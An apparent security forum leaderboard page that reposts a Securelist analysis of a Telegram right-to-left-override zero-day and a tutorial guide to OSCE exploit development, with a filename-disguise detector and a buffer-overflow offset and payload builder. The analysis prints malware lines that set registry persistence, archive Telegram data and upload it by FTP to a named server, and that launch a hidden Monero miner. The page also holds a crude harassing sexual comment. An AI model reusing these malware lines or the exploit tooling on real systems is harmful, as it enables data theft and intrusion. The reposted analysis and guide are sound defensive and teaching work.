Leaderboard
Popular Content
Showing content with the highest reputation on 02/13/18 in all areas
-
Opensc, yes, baaaa. It is now at https://www.opensc.io if anyone is interested.
-
I remembered Cem Paya, the guy who originally worked on Google Wallet. If you are interested in his blog: https://randomoracle.wordpress.com/author/cemp/
-
Source: https://securelist.com/zero-day-vulnerability-in-telegram/83800/

The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as 'U+202E'; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse.

Launching an attack on Telegram

Below is an account of how this vulnerability was exploited in Telegram:

The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:

    evil.js -> photo_high_re*U+202E*gnp.js

Where *U+202E* is the RLO character, to make Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file; it still has the extension *.js.

The attacker sends the message, and, surprise!, the recipient sees an incoming PNG image file instead of a JS file:

When the user clicks on this file, the standard Windows security notification is displayed:

Importantly, this notification is only displayed if it hasn't been disabled in the system's settings. If the user clicks on 'Run', the malicious file is launched.

Exploitation in the wild

After learning of the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios.

Remote control

The aim of this sort of attack is to take control of the victim's system, and involves the attacker studying the target system's environment and the installation of additional modules.

Attack flowchart

At the first stage, a downloader is sent to the target, which is written in .Net, and uses the Telegram API as the command protocol:

With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled:

When launched, it modifies the startup registry key to achieve persistence on a system and copies its executable file into one of the directories, depending on the environment:

Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian:

The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below:

Command (English translation): Function
“Онлайн (“Online): Send list of files in directory to control bot.
“Запус (“Launch): Launch executable file using Process.Start().
“Логгер (“Logger): Check if tor process is running, download logg.zip, unpack it, delete the archive and launch its content.
“Скачать (“Download): Download file into its own directory.
“Удалить (“Delete): Delete file from its own directory.
“Распаковать (“Unpack): Unpack archive in its own directory using specified password.
Убить (Kill): Terminate specified process using process.Kill().
Скачат (Download): Same as 'Download' (see above), with different command parsing.
Запуск (Launch): Same as 'Launch' (see above), with different command parsing.
Удалить (Delete): Same as 'Delete' (see above), with different command parsing.
Распаковать (Unpack): Same as 'Unpack' (see above), with different command parsing.
Процессы (Processes): Send a list of commands running on target PC to control bot.

An analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim user.

Miners and more

Amid the cryptocurrency boom, cybercriminals are increasingly moving away from 'classic robbery' to a new method of making money from their victims, namely mining cryptocurrency using the resources of an infected computer. All they have to do is run a mining client on the victim computer and specify the details of their cryptocurrency wallet.

Scenario #1

Attack flowchart

At the first stage of the attack, an SFX archive with a script is used that launches an executable file:

    Path=%temp%\adr
    Setup=%temp%\adr\run.exe
    Silent=1
    Overwrite=2

This run.exe file is in fact a BAT file. The batch script, after extraction, looks like this:

As we can see, the malicious program first opens a decoy file, in this case an image, to lull the victim into a false sense of security. Then, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive.

nheq.exe: an Equihash miner for NiceHash (in this specific case, it mined Zcash). Can use the resources of both the CPU and graphics accelerator:

taskmgn.exe: another popular miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a known specific string with pdb path:

We have seen several versions of this batch script, some of which have extra features:

This specific version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive that contains other miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access:

The attack flowchart is approximately as follows:

We have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware. The file address4.exe is worthy of a special mention.

Like the other files, it is an SFX archive with the following contents:

All components named st*.exe are executable PE files converted in a similar way from batch scripts. The SFX script launches the component st1.exe:

    Path=%temp%/adress
    Setup=%temp%/adress/st1.exe
    Silent=1
    Overwrite=2

st1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry:

    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f

So the st2.exe file launches when the system is booted next time (the :: lines are the analysts' annotations, not part of the script):

    :: Waits for Telegram to launch
    TIMEOUT /T 10 /NOBREAK
    chcp 1251
    :: Terminates Telegram processes
    tskill telegram
    taskkill /IM telegram.exe
    :: Creates a temporary directory
    md %temp%\sss
    cd %temp%\sss
    :: Packs the Telegram directory into a RAR archive
    "%temp%\adress\WinRAR.exe" A -ibck -inul -r -agYY-mm-dd-hh-mm-ss "%temp%\sss\1.rar" "%appdata%\Telegram Desktop"
    TIMEOUT /T 60 /NOBREAK
    :: Checks Internet connection and launches st3.exe
    :begin
    ping -n 1 ya.ru |>nul find /i "TTL=" && (start "" %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :begin)

As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier:

    @echo XXXXXXXX>command.txt
    @echo XXXXXXXX>>command.txt
    @echo binary>>command.txt
    @echo mput %temp%\sss\*.rar>>command.txt
    @echo quit>>command.txt
    ftp -s:command.txt -i free11.beget.com
    del command.txt
    attrib %temp%/adress +H
    attrib %temp%/adress\* +H

On that FTP server, we discovered several archives of this type containing Telegram directories stolen from the victims:

Each dump contains, as well as the Telegram client's executables and utility files, an encrypted local cache containing different files used in personal communications: documents, videos and audio records and photos.

Scenario #2

Just like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it contains.

Its main job is to open a decoy image to distract the user, and then download and launch the payload:

The payload is an SFX archive with the following script:

svchost.vbs is a script controlling the launch of the CryptoNight miner (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner's process and re-launches it when the task manager is closed. The script contains the appropriate comments:

The miner itself is launched as follows:

    WshShell.Run "csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1" & cores, 0

The pool address is associated with the cryptocurrency Monero. On the server itself, in addition to the specified payload files, we found similar SFX archives with miners:
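The RLO trick in the post above only works because a renderer draws the text after U+202E right-to-left while the operating system still goes by the real extension. The Python below is an added example, not code from the Securelist write-up, showing how a receiving application (or a mail/chat gateway) can compare the extension the user will see with the extension the OS will execute, and flag filenames where the two disagree. The rendering is a deliberate simplification of the Unicode Bidirectional Algorithm (one unterminated RLO over Latin text, as in the Telegram case); the sample filenames other than the photo_high_re<U+202E>gnp.js pattern are constructed for the demonstration.

```python
"""Flag filenames that use Unicode bidi controls to disguise their real extension.

Added example; not code from the Securelist write-up. Only the
photo_high_re<U+202E>gnp.js pattern is taken from it, the other names are constructed.
"""
import os
import unicodedata

# Explicit bidirectional formatting characters (embeddings, overrides, isolates).
# Any of them inside a filename deserves a look; U+202E (RLO) is the one abused here.
BIDI_CONTROLS = frozenset(
    "\u202a\u202b\u202c\u202d\u202e"  # LRE, RLE, PDF, LRO, RLO
    "\u2066\u2067\u2068\u2069"        # LRI, RLI, FSI, PDI
)


def bidi_controls_in(name: str) -> list[str]:
    """Return the Unicode names of every bidi control character in `name`."""
    return [unicodedata.name(ch) for ch in name if ch in BIDI_CONTROLS]


def real_extension(name: str) -> str:
    """Extension the OS will actually use: controls stripped, lower-cased."""
    clean = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return os.path.splitext(clean)[1].lower()


def rendered_name(name: str) -> str:
    """Approximate what a naive renderer shows: everything after the first RLO is
    drawn right-to-left, i.e. reversed, up to the end of the string.
    Assumption (simplified bidi): Latin-only text and a single unterminated RLO."""
    if "\u202e" not in name:
        return name
    prefix, _, tail = name.partition("\u202e")
    return prefix + tail[::-1]


def apparent_extension(name: str) -> str:
    """Extension the user *sees* in the rendered filename."""
    return os.path.splitext(rendered_name(name))[1].lower()


def is_disguised(name: str) -> bool:
    """True when a bidi control makes the visible extension differ from the real one."""
    if not bidi_controls_in(name):
        return False
    return apparent_extension(name) != real_extension(name)


# Constructed sample set: the Telegram pattern plus benign and edge cases.
SAMPLES = {
    "photo_high_re\u202egnp.js": True,   # shown as photo_high_resj.png, executes as .js
    "invoice\u202efdp.exe": True,        # shown as invoiceexe.pdf, executes as .exe
    "report.pdf": False,                 # no controls at all
    "\u202ejpeg.exe": True,              # shown as exe.gepj, executes as .exe
    "readme\u202etxt.txt": False,        # control present, but visible and real ext agree
}


def scan(names) -> dict[str, bool]:
    """Classify each filename; the audit log would also want bidi_controls_in()."""
    return {n: is_disguised(n) for n in names}


if __name__ == "__main__":
    for n, flagged in scan(SAMPLES).items():
        print(f"disguised={flagged!s:5} real={real_extension(n):5} shown={rendered_name(n)!r}")
```

Comparing extensions rather than merely rejecting any bidi control keeps legitimately named right-to-left files usable; the last sample shows a control character that does not change what the user sees, which is why `scan()` leaves it unflagged while `bidi_controls_in()` still reports it for logging.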
-
https://capec.mitre.org/data/definitions/471.html
http://www.zdnet.com/article/skype-cannot-fix-security-bug-without-a-massive-code-rewrite/
-
It is very unlikely that an integrated graphics card, or the processor itself, has broken. I recommend you take it apart again; maybe you forgot a cable. Since it is already "broken", there is little more harm you can do. After you take it apart, remove the processor and check whether you bent a pin or something when you inserted it. If not, try to connect as few things as possible, for example without the CD-ROM, HDD or speakers, etc. Try with only the screen, the board itself, one RAM module, the charger (power supply) and the power button, without fully mounting it. Make sure the board is not touching anything like clothes or a screw, or that you haven't left grandma's soup fork on it (so it doesn't short out), and turn it on. If it doesn't turn on, check 6-7 times that you connected what I said, then try again. If it does the same as at the start, no video output, move the RAM module to the other slot and try again. If it still doesn't work, take that module out and put in the other one, and do the same as with the first (switch slots if it doesn't work). Once it boots fine, put all the junk back (HDD, CD-ROM, the vibrator) one at a time; after each part you put in, turn it on and see if it works. Once you have everything connected, close it up completely and send me a beer xD I'll keep an eye on the topic, let me know what you did.
-
https://leanpub.com/xss by https://twitter.com/brutelogic
-
What business is it of yours, man. Let the woman plug a socket in or something :))))))) You could have simply said you want to access a camera, not that your mum is involved in it. I've already got a hard-on (two, even) thinking about what she could do in the elevator. You creep.
-
OSCE/CTP Prep Guide
July 18, 2017, Tulpa

What this prep guide is and isn't

If you have read my OSCP prep guide (https://tulpa-security.com/2016/09/19/prep-guide-for-offsecs-pwk/), then you know that I don't just dump a ton of redundant resources on you and say good luck. Your time is precious, and your learning should be well calibrated to studying the best quality information available. This prep course is meant to be completed prior to taking the CTP course. If you look at what CTP covers, you'll find that I don't delve into some of the course topics, and the reason for that is twofold. Firstly, this is meant to prepare you for CTP, not to replace CTP in any way. Secondly, CTP is an outstanding quality course and some things are covered from the ground up in such a way that you simply don't need to prepare for them.

Although the resources in this course are carefully curated, they won't do you much good if you simply read the notes and watch the videos. You have to practice! Repetition is the mother of skill, and exploit development is no different. You will also find that I recommend reading two tutorials on the same topic. This isn't about repetition as much as it's about getting two perspectives on the same topic. This is a great way of really deepening your understanding of the course material.

Disclaimer: I am not affiliated with any of the authors of the resources that I mention here. I recommend them and reference them because I truly believe in their work and its applicability to the OSCE certification.

Lesson 0 – Getting your resources together

In order to follow along, you need to get your hands on the Security Tube Linux Assembly Expert (32 bit) course. It's quite affordable when you consider the value that you're getting. As you know, CTP/OSCE is Windows based, so the SLAE material isn't going to help you with all the concepts; however, it does a very good job of covering a wide range of topics that you need to know.

I honestly haven't found a better guide, and believe me when I say that I tried. I am very pleased to share that the kind people from Security Tube are offering readers of this guide 25% off not only the 32-bit SLAE course, but also the 64-bit version! Thank you Vivek Ramachandran for making your excellent material more accessible to the community. To get the discount, you can follow this link: http://promo.securitytube-training.com/slae64092015

For your lab environment I would recommend that you set up three machines: the first obviously being Kali, the second a Windows XP SP3 client, and lastly a Windows 7 client. A lot of people e-mailed me when I wrote my OSCP prep course and asked where they can get hold of older versions of Windows. I can't provide you with a download link, but I'm sure that you will figure it out. In my case, I was lucky enough to have some old MSDN disks lying around. After you have set everything up and installed Immunity and mona (or Olly), be sure to take a snapshot of your machines before starting.

Lesson 1 – Introduction

The key to deepening and accelerating your learning in this particular subject depends on what you do in this first lesson. While not glamorous, this is ideally where you need to spend some time to memorize the various registers and what they are used for, as well as the various sections of the debugger. If you know off by heart what the EDI register is used for, as an example, then you can think creatively and form a much deeper understanding of the rest of the material going forward. Don't forget to also focus on the various sub-parts of the registers, AH vs AL etc. What I found very useful was using a flashcard app at brainscape.com. This app in particular is great because it uses an algorithm to determine how well you know each card and then adjusts the frequency with which they appear. Go through the resources below in order prior to creating your flash cards.
The first resource you need to go through is http://www.securitysift.com/windows-exploit-development-part-1-basics/ This is where you will get the bulk of the information for your flash cards. Also pay particular attention to the layout of Immunity Debugger. Both Olly and Immunity use exactly the same layout, so rest assured that this information is worth knowing. Also, don't get too intimidated by the PEB and TEB(S) section. If you're struggling with that section, you can come back to it later in the course and it will click.

Next up is SLAE videos 1-7. The total length of these videos is just over an hour, but you can expect to spend an extra 30 minutes on them because of how frequently you will have to pause and take notes for your flash cards. In the next lesson you'll be working through GDB. You don't have to have your flashcards memorized prior to moving on to the next session, so no need to pause your progress.

Lesson 2 – GNU Debugger (GDB)

In order to make the most of the SLAE videos, you have to do the GDB course that's included. I know that you want to get to the meat of the course and start pwning machines, but you have to walk before you can run.

Tip: These videos are very easy to follow along with when you up the playback speed. I found x1.75 to be a comfortable speed for these videos in particular (don't do the same with the rest of the SLAE course). By doing this you can cut the total video time from 3 hours and 40 minutes down to 2 hours and 52 minutes.

Lesson 3 – Basic Assembly

In this section you need to watch the 8th and 9th videos in the SLAE series, which is only 30 minutes. More than just focusing on the assembly, I want you to pay particular attention to how he uses a syscall to print hello world. This is the essence of shellcoding, which we will get to later. After that, watch SLAE videos 10-12, which will take you 53 minutes.

At this stage it's a good idea to memorize the opcodes for one or two commands, which will make reading assembly so much easier down the line. The ones that I recommend you include in your own list:

CALL – FF Dx. This could be anything from D0 to D7 based on the register that it's referencing. Again, you're just trying to recall what a command does when you see it, so you don't have to memorize the number for each register.
JMP – EB. You're going to be seeing this one a lot!
INC – 4x. Again this goes from 40 to 47 depending on the register. When you fuzz a program you're going to be using a lot of A's, B's and C's, which translate to 41, 42, 43 respectively. That means that sending A (or 41 in hex) to a program will be interpreted as an INC ECX command. This is useful to know not just for quickly identifying where your offset lands, but also as a reminder that they can be interpreted as commands.
DEC – 4x. This carries on where INC stopped and goes from 48 to 4F depending on the register.

Careful of information overload here. Limit your list to seven or eight opcodes at most.

Lesson 4 – Stack based overflows

The lesson that you have been waiting for. Let's pop some shells! Go through these two lessons in order first, because the Corelan tutorial does a good job of including a quick refresher of what you have already learned. Remember to DO the work and not just read them over.

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
http://www.securitysift.com/windows-exploit-development-part-2-intro-stack-overflow/

Vulnserver is an amazing go-to for practice and for you to test a ton of your exploits. Once you successfully exploit them, keep those scripts on hand because it's such a quick way to get some of your shellcode into memory and also to test out some commands. You can find the download link for vulnhub here, along with a tutorial on how to exploit it in various ways.
Try and do it yourself first, and if you get stuck then you can have a look at the walkthrough for guidance.

http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-introduction/
http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-2-exploiting-the-stack-overflow/
http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-3-%E2%80%94-adding-shellcode/

Lesson 5 – Useful information

This is a very short lesson to quickly drop you three resources that were very important to me during my OSCE. Firstly, don't trust Windows Calculator for hex. We'll only be doing these manual calculations later in the course, but allow me to explain. Open up Windows Calculator and set it to 'programmer' mode. Click on 'HEX' on the left-hand side, type in 9A and divide that by 3. The answer is 33, right? Wrong. What Windows Calculator doesn't tell you is that the real answer is 33 with a remainder of 1. You can verify the answer here: http://www.calculator.net/hex-calculator.html?number1=9A&c2op=%2F&number2=3&calctype=op&x=68&y=7

Next up is the best wallpaper you will ever see. It's been a great reference and I think you'll find it very useful for CTP: http://i.imgur.com/Mr9pvq9.jpg

Lastly, there's an online disassembler which I used once or twice when I wasn't at my Kali machine: https://www.onlinedisassembler.com/static/home/

Lesson 6 – Offsets and JMP's

When your exploit isn't working as expected, chances are that your offset is wrong. Make sure you keep this information at the forefront of your mind. http://www.securitysift.com/windows-exploit-development-part-3-changing-offsets-and-rebased-modules/

Now it's time for JMPing around memory. You'll find in the CTP course that sometimes you need to creatively JMP out of a tight spot to get to a bigger buffer space. At the bottom of the page of the Corelan tutorial I'm about to share, you'll find a reference chart listing a couple of different JMP's.

Pick a couple, load up one of your vulnserver exploits and experiment with them. It's important that you understand the various conditions that need to be met for some of these JMP's to occur. https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/

Also be sure to check out this article for more inspiration: http://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/

Lesson 7 – Fuzzing

For the OSCE, you have to use a fuzzer called Spike. While incredibly powerful and versatile, it's not the prettiest and requires a bit of work on your part. It's not difficult to use, but it's very easy to screw up if you don't pay attention to your fuzzing template. When building a template, be sure to first interact with the program the normal way while running Wireshark. As an example, FTP to a server and have a look at what the traffic looks like. Your job now is to create your Spike template to replicate exactly what Wireshark has captured. Once again, fire it up while running Spike to double-check that you're in fact getting the same result. Since you're already familiar with vulnserver, it would be a good idea to practice there. Here are two tutorials that will help you do just that.

http://resources.infosecinstitute.com/intro-to-fuzzing/
http://resources.infosecinstitute.com/fuzzer-automation-with-spike/

Lesson 8 – More Assembly

Now it's time to watch some more SLAE videos, except this time you'll notice that I'm leaving out a couple of them. You're welcome to watch them of course, but as I mentioned earlier I want to give you only the essentials to focus on given your limited time. The SLAE videos I recommend are 13 and 15-21. The total video length is 1 hour and 27 minutes.

Lesson 9 – Structured Exception Handlers (SEH)

Before we start, rest assured that this is not a hard topic. It's well documented and once you have the hang of it, it's a piece of cake.
Start out by going through these tutorials first.

https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
http://www.securitysift.com/windows-exploit-development-part-6-seh-exploits

Next up, it's time to practice SEH on your trusty vulnserver. http://resources.infosecinstitute.com/buffer-overflow-vulnserver/

Lesson 10 – Egghunters

A lot of people recommend the skape egghunter paper, which you can find here: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf You're welcome to go through it, but I have to say that after spending a whole day on this, I didn't walk away with much value that I could apply in practice. Don't get me wrong, it's a great paper, but it was published in 2004 and effectively you'll only need to make use of one of the egghunters in that paper. These two tutorials should give you everything that you need to get cracking (sorry, I couldn't help myself with the pun):

https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
http://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting

Security Sift also talks about a technique called an omelet. You can skip that part because it doesn't relate to the CTP course. Now head back to vulnserver and give your egghunter a test!

Lesson 11 – ASLR

Alright, this is very similar to SEH in terms of complexity (which is to say that it's not that hard once you get the hang of it). You have to keep your blinkers on and only read the section in this paper that covers ASLR, and skip everything else. https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ In fact, don't spend much time here because the CTP course does a great job of covering everything you need to know about ASLR.

Lesson 12 – Restricted Characters

By now you know all about bad characters and how to identify them. There is a whole chapter in the CTP course that deals with a particularly restrictive exploit which is quite infamous. Grab some popcorn and watch this amazing DEF CON talk by Mati regarding this very exploit. At this stage you'll be able to follow along without any problems, but don't worry about trying to replicate it just yet. You'll be spending a lot of time in CTP doing just that. Instead, I would recommend that you head back to vulnserver. Some of the potential exploits have some bad characters that you can play with, but I would recommend a different approach. Create an exploit, and limit yourself instead. Ban a couple of your favourite commands like EB, and find alternative ways to get the same result. JMP commands are a great way of challenging yourself because the results are obvious and require a bit of creative thinking. http://resources.infosecinstitute.com/restricted-character-set-vulnserver/

Exploit development requires a significant amount of creative thinking. Blindly following steps isn't going to get you far, so make sure you have a few tricks up your sleeve.

Lesson 13 – Mona

The CTP course is delivered in Olly, but you're welcome to make use of Immunity and mona (neither is restricted in the exam). Mona can make your life a lot easier, so I would recommend that you spend a bit of time getting to know some of the most commonly used commands. In fact, identifying bad characters is one of the most useful features of mona, so it builds on the previous lesson quite nicely. There is an extensive reference list here: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/

Lesson 14 – Shellcoding

Now this is where the fun REALLY starts. Disclaimer: shellcoding per se is not covered in the CTP course.
That being said, I think it's important enough to include here because it allows you to understand what your shellcode is doing, as well as to make some changes to it yourself. Keep in mind, however, that when you inspect a Metasploit-generated shell, remember not to encode it, otherwise it won't make much sense. For the Corelan tutorial, you should not only read it but actually do it yourself. I cannot stress the value of doing this enough. https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

Now would be a good time to watch SLAE videos 22-26 and pay attention to how he makes use of Linux syscalls. It's only one and a half hours, but these videos are particularly packed with amazing information. Next up, check out these guides in the order that they are listed.

https://www.fuzzysecurity.com/tutorials/expDev/6.html
http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/
http://www.vividmachines.com/shellcode/shellcode.html#ws

Lesson 15 – Anti-Virus evasion

This is a particularly tricky topic to recommend resources on because it's a very deep rabbit hole. Remember that CTP/OSCE is primarily focused on exploit development, and AV evasion is just one part of that. The techniques covered in CTP are a bit outdated, but still form the foundation of many other techniques. Because you can easily get side-tracked, I would recommend sticking to SLAE videos 27-36 only. I know it's tempting to do more research (and you're welcome to), but if your time is limited then you can just focus on the videos, which will prepare you adequately. There are 2 hours and 30 minutes worth of information to go through in the videos.

Lesson 16 – Develop your own exploit!

At this stage, you know more than enough to go out and create and publish your very own 0day (of sorts). Back in 2016, I discovered a set of 0days in products that are all created by one company.

Since then, they have released many more versions of the same software, all of them vulnerable but requiring different exploits. If you search exploit-db, you'll find that a lot of other people have created exploits since then for all the various versions, and have done so in various different ways. Now it's your turn. Download the software, get fuzzing, develop an exploit and submit it to exploit-db. Make sure that it hasn't been done before for the version that you're targeting, and if it has, then at the very least you have to use a completely different technique to get it working. The company and software downloads can be found here: http://www.flexense.com/ Here is one example of one of my early exploits for one of their products: https://www.exploit-db.com/exploits/40455/ Fuzzing one of the Flexense products will be a great exercise for you because it challenges you to recreate HTTP traffic in a Spike template. Remember to look at EVERYTHING you do under Wireshark.

Lesson 17 – Web Applications

Last but not least, I wanted to discuss the web application section of the course. CTP does a phenomenal job at covering everything you need to know, in such a way that preparing you for it would be redundant. That being said, I want to offer you a few resources and words of advice. The two main topics that you really need to master and know everything about are LFI and XSS. Finding those vulnerabilities is one thing, but make sure you know about the various ways in which you can exploit them to gain remote access to a server. Yup, that's right. Here are a couple of resources that I found useful in my research of the topic:

https://www.exploit-db.com/docs/40992.pdf
https://excess-xss.com/
https://www.veracode.com/security/xss

Lesson 18 – Now what?

At this stage you should be more than ready to take the CTP course. I would recommend working through the entire CTP course a minimum of three times, and make sure you do everything manually.

As an example, you will be expected to do some manual shellcode encoding. Sure, you can do this with a script, but you would really be cheating yourself out of an amazing (and painful) learning experience. Along the way I would also recommend that you spend a bit of time reading the exploits on exploit-db. I have learned a lot of very useful scripting techniques in a very short space of time because of this. In fact, I would go so far as to say that you should start a collection of skeleton exploits for various purposes. I have also gone through a good couple of books in preparation for the OSCE exam and, while some of them are really good (like the Shellcoder's Handbook), they didn't really help me all that much. Offensive Security does a fantastic job with the course material and I would recommend that you expand your search for additional material only once you have gone through the manual and videos. The course has less to do with reading material, and more to do with practice. There is no substitute for practice and your time will be well spent doing just that.

Source: https://tulpa-security.com/2017/07/18/288/
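Lesson 3 and Lesson 6 of the guide above come together in one routine every stack-overflow exploit starts with: send a buffer of unique bytes, read the four bytes that landed in EIP (which, as the guide notes, the debugger shows as opcodes such as 0x41 = INC ECX), and turn them back into an offset. The Python below is an added example, not code from the guide, from Offensive Security or from Metasploit; it re-implements the Metasploit pattern_create/pattern_offset scheme (3-byte chunks of upper, lower, digit, unique for the first 20280 bytes) and then assembles the classic junk | return address | NOP sled | shellcode buffer once the offset is known. The return address and shellcode in the usage line are placeholders, not values for any real target.

```python
"""Cyclic pattern generator and offset finder for locating which bytes of a fuzz
buffer end up in EIP, plus the buffer layout that uses the result.

Added example; not code from the prep guide, Offensive Security or Metasploit.
"""
import string
import struct


def pattern_create(length: int) -> bytes:
    """Return `length` bytes of the Aa0Aa1...Zz9 cyclic pattern (max 20280)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern: bytes, value) -> int:
    """Offset in `pattern` of the 4 bytes that landed in a 32-bit register.

    `value` is either the int read from the debugger (e.g. EIP=0x41356141) or the
    raw 4-byte string. x86 is little-endian, so the int is packed as '<I' before
    searching. Returns -1 if those bytes do not occur in the pattern.
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    return pattern.find(needle)


def build_exploit_buffer(offset: int, ret: int, shellcode: bytes, total: int) -> bytes:
    """Lay out junk | return address | NOP sled | shellcode | padding.

    `ret` is packed little-endian; `total` keeps the send size identical to the
    pattern that crashed the target, which is what makes the offset stay valid.
    """
    nops = b"\x90" * 16
    buf = b"A" * offset + struct.pack("<I", ret) + nops + shellcode
    if len(buf) > total:
        raise ValueError("payload does not fit in the buffer")
    return buf + b"C" * (total - len(buf))


if __name__ == "__main__":
    # Step 1: fuzz with a unique pattern instead of plain A's.
    crash = pattern_create(2000)
    # Step 2: the debugger reports EIP; constructed value for the demonstration.
    eip_seen = 0x41356141               # bytes 41 61 35 41 == b"Aa5A"
    off = pattern_offset(crash, eip_seen)
    print(f"EIP overwritten at offset {off}")
    # Step 3: rebuild the buffer with a placeholder return address and INT3 shellcode.
    payload = build_exploit_buffer(off, 0xDEADBEEF, b"\xcc" * 4, 2000)
    print(f"buffer of {len(payload)} bytes, ret bytes at {off}: {payload[off:off + 4].hex()}")
```

The same `pattern_offset()` answers the second question the guide raises in Lesson 6, where your shellcode landed: run it on the value of ESP (or any other register) at the crash and you get the distance from the start of the buffer to that register, which is what a JMP needs to reach.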
-
https://drive.google.com/open?id=0B-IYIin_KvNDWVpSYkVuamxGRWc Archive with 8 courses and 15 labs, all in Romanian, with explanations and examples. The classes (the basics) can be learned easily in a few days.
-
Hello, could you please give a simple step-by-step tutorial on how to use this? I would appreciate your response. Thank you